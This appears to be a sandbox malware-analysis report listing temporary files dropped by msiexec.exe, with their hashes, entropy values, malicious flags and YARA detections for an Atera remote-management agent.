                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF53FE20EEA41BFF79.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF53FE20EEA41BFF79.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF59B121CA4FEB0634.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF5D2DFBC75319C511.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF5D2DFBC75319C511.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF5D2DFBC75319C511.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6398C7E5B6164471.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6A5C398114511295.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6A5C398114511295.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6D3CFC025FA64744.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6D3CFC025FA64744.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6E5CDEA7C35F1C0C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6016796972852392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhTuRc06WXz+nT5odfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:9hT1jnT6fqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:6DCE79B8B3C21F74B4479E523BF949F8
                                                                                                                                                                                                                                        SHA1:863E871C321FFFF7511AE01C7DAFC36A2A0A9BE9
                                                                                                                                                                                                                                        SHA-256:03050FF94DEF001CC234B47DB7A07F246D51804C1DB8321EAB039F0E27C6B68F
                                                                                                                                                                                                                                        SHA-512:BE06C0A8839E334902A0FCCAFDCBB0CC72EFCA877F35A39E57C7AF62863232FD296E0A968A9B532587BB43C407CE8DB2239A5F1E9223AEA23968DC5A1EC70CAA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6E5CDEA7C35F1C0C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6ED209FDEBEBE8CC.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.620433948434433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4D8PhPuRc06WXJEnT53DeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:4qhP1HnTpD7IciuBulU4
                                                                                                                                                                                                                                        MD5:DC61A0CDBF3DD456206101D76350E716
                                                                                                                                                                                                                                        SHA1:AD3416020998E9135D0A4A45D4F483B3C805D880
                                                                                                                                                                                                                                        SHA-256:63CF342EBFAE1EF9C46D60E0719A0E42B82E06E77EF89D011E07229AFE78CFB5
                                                                                                                                                                                                                                        SHA-512:B2F8C8055E6491B61E08ED5DE897E711CFA763F2843FBBBFDC3E3668D4E34E39A8A91D486A9B6D1C3F6603788F1CF759396E9D27E09B9D7A147B56FEB6704B3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF6ED209FDEBEBE8CC.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF6F2770E4A6D30299.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF76E732F4A95E30F1.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.16374516525894073
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TEubmStedvPdv+qISoedvPdvbCnuhnq9FnCFF:hybIciuBulGF
                                                                                                                                                                                                                                        MD5:BB23FAFFAA6624C3CEBFCEC74C12572F
                                                                                                                                                                                                                                        SHA1:75E3187166BA47501DE885C015896E19CA33624A
                                                                                                                                                                                                                                        SHA-256:41F5726879AF0A651B6E5A5A33FAC4972C1511C142971EF2F39B7F4ED50A7A7E
                                                                                                                                                                                                                                        SHA-512:AF2A1C43DCC4714AB3D6B1C9434667C0D99C1E504E48D31A2086E4855C75F83988DC7EBE07CF2AB7785FEA8B34BD2B62E1D42CE4664EEFEBEA448AA6DCD5D0A5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF76E732F4A95E30F1.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF77FB251FBB936EDC.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF80A59696F5CFEB2C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.255395292365597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:n69u5th8FXz/T57dYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:69RBTPn818I3DfNP
                                                                                                                                                                                                                                        MD5:4B6C30E4090CFC782D0CAD9F2CFC6C0E
                                                                                                                                                                                                                                        SHA1:F5CBAB5E2A09E50DBA6188C07818486DF06EDAE1
                                                                                                                                                                                                                                        SHA-256:DCF090068A14B7EECAF69890A43768B522686BD29112217EAB5AFF90D157D617
                                                                                                                                                                                                                                        SHA-512:A6294C4B864351B178BE2AE4CF4A1822C94EF56E97F9722E720B7069A894A2642251D38AF6D7C3BED1450691759539D198D0910FF4DE26602693E168D15E8E1B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF80A59696F5CFEB2C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF80A59696F5CFEB2C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF815BDE1D565DD95C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5707321163549923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:58PhFuRc06WXz+FT5rdYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:0hF1jFT3n818I3DfNP
                                                                                                                                                                                                                                        MD5:170E02EA2A6FBD2AF83F2EAE5C71AE7D
                                                                                                                                                                                                                                        SHA1:C3BEA972F21522D925488282042EC29ACEFAEDCA
                                                                                                                                                                                                                                        SHA-256:B2A35392E5DBD55006AF16BAD76EDDAEDEC4F83AF394C887E96D90FBB240EF3C
                                                                                                                                                                                                                                        SHA-512:07CEC48054691B7D9FE4328364938F8A487A14E820CCA0D0CFBC3273A0B3C5E7A57AC4C9F37FCCB38258906897DF45C4FB1AFD6975FDA36F0318B772A67C54FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF815BDE1D565DD95C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF82FD6BE0F5CA92DE.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF8C94DFA73AB67542.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF8D51130C93BB6C0C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.14516026263896395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TUSEuSsndYSjnd/EqdGUDjzbQXkJdYm8:AiWI3DfVTn8
                                                                                                                                                                                                                                        MD5:A410CFD599F90DE28F9A33DE288FFDF7
                                                                                                                                                                                                                                        SHA1:C28EA74AD89AFAA8E29A62166E0F17E05E975605
                                                                                                                                                                                                                                        SHA-256:52BB9AF3ED19102787685562CD7E2297048F80D530D700259CC9895C4B6297FB
                                                                                                                                                                                                                                        SHA-512:31ECA39D64C918BF9ED28C02DA7EF705856D41E8CE764527AB7EFA4FC8A33B43BDE3876FF8CC5EE0A910EFBBAE8B83324DFFB0A921829874A016466D90837899
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8D51130C93BB6C0C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF8D51130C93BB6C0C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF95A16CC7A7D38448.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF95A16CC7A7D38448.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF9C62BCA586765B6F.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF9E63ADECE281EC17.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
